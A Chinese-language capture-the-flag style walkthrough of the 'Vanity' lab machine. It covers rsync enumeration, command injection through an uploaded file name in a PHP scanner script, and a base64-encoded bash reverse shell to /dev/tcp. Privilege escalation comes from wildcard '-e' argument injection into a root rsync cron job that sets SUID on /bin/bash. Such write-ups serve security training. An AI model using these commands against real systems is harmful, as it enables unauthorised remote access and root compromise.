主要知识点
Linux命令注入
rsync 脚本劫持(以前tar 备份脚本劫持也是利用了类似的方法)
具体步骤
nmap扫描结果,发现web服务开放,并且 rsync服务开放,值得研究一下
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-30 14:37 UTC
Nmap scan report for 192.168.51.234
Host is up (0.00065s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
| 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Vanity Virus Scanner
873/tcp open rsync (protocol version 31)
80端口看起来是一个文件上传的web 应用,但是经过测试发现是有文件后缀校验的,暂时搁置一下
通过rsync来把remote server上的目录同步下来,不过backup目录同步需要密码,而我们目前没有,所以只能先同步一下source目录
先对目标服务器进行rsync服务扫描 nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 11:41 CST
Nmap scan report for 192.168.203.234
Host is up (0.22s latency).
PORT STATE SERVICE VERSION
873/tcp open rsync (protocol version 31)
| rsync-list-modules:
| source Web Source
|_ backup Virus Samples Backup
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.74 seconds
继而进行rsync同步
C:\home\kali\Documents\OFFSEC\GoToWork\Vanity\test> rsync -av rsync://username@192.168.216.234:873/source ./source
receiving incremental file list
created directory ./source
./
index.html
style.css
uploads/
uploads/upload.php
sent 96 bytes received 4,002 bytes 2,732.00 bytes/sec
total size is 3,707 speedup is 0.90
C:\home\kali\Documents\OFFSEC\GoToWork\Vanity\test> ls -lart
total 12
drwxr-xr-x 3 kali kali 4096 Oct 25 2022 source
drwxrwxr-x 5 kali kali 4096 Dec 30 22:32 ..
drwxrwxr-x 3 kali kali 4096 Dec 30 22:35 .
C:\home\kali\Documents\OFFSEC\GoToWork\Vanity\test> ls -l source/uploads
total 4
-rw-r--r-- 1 kali kali 738 Oct 25 2022 upload.php
C:\home\kali\Documents\OFFSEC\GoToWork\Vanity\test>
source目录下有一个upload.php文件,其中的代码如下,看起来会对上传的文件校验后缀,如果在deny list中,就会阻止上传,反之,则会运行/usr/bin/clamscan 命令,参数是name变量,于是我们可以尝试一下在name中拼接linux命令
<?php
//Check if the file is well uploaded
if($_FILES['file']['error'] > 0) { echo 'Error during uploading, try again'; }
//Set up valid extension
$extsNotAllowed = array( 'php','php7','php6','phar','phtml','phps','pht','phtm','pgif','shtml','htaccess','inc');
$extUpload = strtolower( substr( strrchr($_FILES['file']['name'], '.') ,1) ) ;
echo $_FILES['file']['name'];
echo strrchr($_FILES['file'}['name'],'.');
//Check if the uploaded file extension is allowed
if (in_array($extUpload, $extsNotAllowed) ) {
echo 'File not allowed';
}
else {
$name = "{$_FILES['file']['name']}";
$result = move_uploaded_file($_FILES['file']['tmp_name'], $name);
if($result){
system("/usr/bin/clamscan $name");
}
}
?>
利用burpsuite尝试了一下,最后使用了base64 编码的方式创建了reverse shell,其中base64编码的部分为: bash -i >& /dev/tcp/192.168.45.225/80 0>&1
上传并运行pspy64,会发现 /opt/backup.sh会被root定期运行,是个schedule job
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
......
......
2024/12/30 05:38:01 CMD: UID=0 PID=174378 | bash /opt/backup.sh
2024/12/30 05:38:01 CMD: UID=0 PID=174377 | /bin/sh -c bash /opt/backup.sh
其中代码为如下
cd /var/www/html/uploads/
rsync --password-file=/root/passwd -a * rsync://vanity/backup/
而rsync命令的话有-e 参数来制定运行命令
rsync --help
......
......
-e, --rsh=COMMAND specify the remote shell to use
......
......
于是我们仿照曾经tar命令备份的 方法,创建具有'-e xxxxx'的文件名来充当参数,扩展功能
www-data@vanity:/var/www/html/uploads$ echo "chmod +s /bin/bash" > shell.sh
echo "chmod +s /bin/bash" > shell.sh
ww-data@vanity:/var/www/html/uploads$ chmod +s shell.sh
chmod +s shell.sh
www-data@vanity:/var/www/html/uploads$ whereis python
whereis python
/python: /usr/bin/python3.8 /usr/lib/python2.7 /usr/lib/python3.9 /usr/lib/python3.8 /etc/python3.8 /usr/local/lib/python3.8
www-data@vanity:/var/www/html/uploads$ usr/bin/python3.8 -c 'import pty;pty.spawn("/bin/bash")'
<in/python3.8 -c 'import pty;pty.spawn("/bin/bash")'
www-data@vanity:/var/www/html/uploads$ touch -- '-e bash shell.sh'
touch -- '-e bash shell.sh'
过了一会儿,就发现了, /bin/bash具备了SUID
www-data@vanity:/var/www/html/uploads$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18 2022 /bin/bash
www-data@vanity:/var/www/html/uploads$ /bin/bash -p
/bin/bash -p
bash-5.0# cat /root/proof.txt
cat /root/proof.txt
e181a37c7ba8f8cbd276eee4a49a3e8f